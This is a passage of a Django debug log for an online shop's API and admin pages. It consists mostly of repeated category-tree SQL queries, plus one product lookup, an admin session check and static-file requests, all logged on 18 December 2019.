"shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:21:56,431 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:21:56,435 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:21:56,439 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:21:56,443 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:21:56,447 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:21:56,454 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:21:56,458 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:21:56,462 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:21:56,466 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:21:56,470 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-18 09:21:56,474 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-18 09:21:56,480 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-18 09:21:56,484 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-18 09:21:56,488 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-18 09:21:56,491 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-18 09:21:56,495 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-18 09:21:56,501 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-18 09:21:56,505 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-18 09:21:56,509 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-18 09:21:56,513 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-18 09:21:56,517 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-18 09:21:56,524 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-18 09:21:56,528 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-18 09:21:56,533 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-18 09:21:56,537 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-18 09:21:56,541 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-18 09:21:56,545 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-18 09:21:56,550 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-18 09:21:56,553 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-18 09:21:56,557 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-18 09:21:56,562 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-18 09:21:56,566 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [18/Dec/2019 09:21:56] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-18 09:22:00,493 utils 4252 140031721535232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-18 09:22:00,501 utils 4252 140031721535232 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [18/Dec/2019 09:22:00] "GET /api/v1/fire/ HTTP/1.0" 200 482 [18/Dec/2019 09:23:20] "GET /admin HTTP/1.0" 301 0 DEBUG 2019-12-18 09:23:20,731 utils 4252 140031721535232 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-18T09:23:20.717537+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 18, 9, 23, 20, 717537, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-18 09:23:20,735 utils 4252 140031721535232 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-18 09:23:20,785 utils 4252 140031721535232 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-18 09:23:20,799 utils 4252 140031721535232 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2020-01-01T09:23:20.796928+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2020, 1, 1, 9, 23, 20, 796928, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [18/Dec/2019 09:23:20] "GET /admin/ HTTP/1.0" 200 8208 [18/Dec/2019 09:23:21] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [18/Dec/2019 09:23:21] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [18/Dec/2019 09:23:21] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [18/Dec/2019 09:23:23] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [18/Dec/2019 09:23:23] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [18/Dec/2019 09:23:23] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [18/Dec/2019 09:23:23] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [18/Dec/2019 09:23:23] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 [18/Dec/2019 09:23:23] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 DEBUG 2019-12-18 09:26:27,070 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-18 09:26:27,078 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-18 09:26:27,083 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-18 09:26:27,086 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-18 09:26:27,090 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-18 09:26:27,093 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-18 09:26:27,096 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-18 09:26:27,099 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-18 09:26:27,102 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-18 09:26:27,107 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-18 09:26:27,109 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-18 09:26:27,112 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-18 09:26:27,115 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-18 09:26:27,118 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-18 09:26:27,122 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-18 09:26:27,125 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-18 09:26:27,128 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-18 09:26:27,131 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-18 09:26:27,134 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-18 09:26:27,139 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-18 09:26:27,142 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-18 09:26:27,145 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-18 09:26:27,148 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-18 09:26:27,151 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", 